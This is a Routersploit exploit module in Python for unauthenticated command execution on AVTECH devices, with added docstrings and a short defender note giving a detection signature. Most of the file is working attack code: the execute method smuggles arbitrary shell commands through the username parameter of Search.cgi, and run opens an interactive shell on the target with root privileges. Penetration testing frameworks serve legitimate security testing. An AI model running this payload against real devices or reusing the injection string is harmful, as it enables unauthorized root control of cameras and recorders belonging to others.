Routersploit module for AVTECH Device Command Execution
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
class Exploit(HTTPClient):
    """Routersploit module for unauthenticated command execution on AVTECH devices.

    The module issues plain HTTP GET requests to the device's Search.cgi
    handler (``basepath``). ``check`` only probes whether that handler
    answers; ``run`` hands control to the framework's interactive ``shell``
    helper, which in turn calls ``execute`` for each command.

    Defender note: requests to ``/cgi-bin/nobody/Search.cgi`` carrying
    ``action=cgi_query`` together with shell metacharacters in the
    ``username`` parameter are the observable signature of this technique
    and are a reasonable detection rule at the proxy or WAF layer.
    """

    # Framework metadata; the dict keys are read by routersploit, so their
    # spelling and value types must stay as the framework expects.
    __info__ = {
        "name": "AVTECH Device Command Execution",
        "description": """This module exploits a vulnerability in AVTECH device httpd server. The cgi_query action in Search.cgi performs HTML requests with the wget system command, which uses the received parameters without sanitization or verification. By exploiting this issue, an attacker can execute any system command with root privileges without authentication.""",
        "authors": (
            "@jnazario",  # routersploit module
            'Gergely Eberhardt'  # discovery and PoC
        ),
        "references": (
            "https://www.exploit-db.com/exploits/40500/",
        ),
        "devices": (
            'AVTECH',
        )
    }

    # User-settable options; descriptions are what the framework shows in `show options`.
    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")
    # CGI handler every request in this module is addressed to.
    basepath = '/cgi-bin/nobody/Search.cgi'

    def run(self):
        """Entry point called by the framework.

        Runs ``check`` first and only opens the interactive ``shell`` helper
        (provided by the ``routersploit.core.exploit`` star-import) when it
        returns True; otherwise reports the target as not vulnerable.
        """
        if self.check():
            print_success("Target appears to be vulnerable")
            shell(self)
        else:
            print_error("Target is not vulnerable")

    def execute(self, cmd):
        """Send one command to the target inside a GET to ``basepath``.

        ``cmd`` is substituted into the query string as-is (no URL encoding),
        so commands containing characters with special meaning in a URL may
        not arrive intact — assumption, not verified here. The HTTP response
        is discarded: nothing is returned to the caller, so ``shell`` cannot
        show command output unless it obtains it some other way.
        """
        fmt = """{0}?action=cgi_query&ip=google.com&port=80&queryb64str=LW==&username=admin%20;XmlAp%20r%20Account.User1.Password>$({1});&password=admin"""
        self.http_request(method='GET',
                          path=fmt.format(self.basepath, cmd))

    @mute  # presumably silences the framework's request logging during the probe — confirm in routersploit
    def check(self):
        """Return True when ``basepath`` answers with HTTP 200, else False.

        A 200 only shows that the Search.cgi endpoint exists; it does not
        confirm that the vulnerable wget code path is reachable, so a True
        result can be a false positive on patched firmware. A failed request
        (``http_request`` returning None) is treated as not vulnerable.
        """
        response = self.http_request(method='GET',
                                     path=self.basepath)
        if response is None:
            return False
        if response.status_code == 200:
            return True
        return False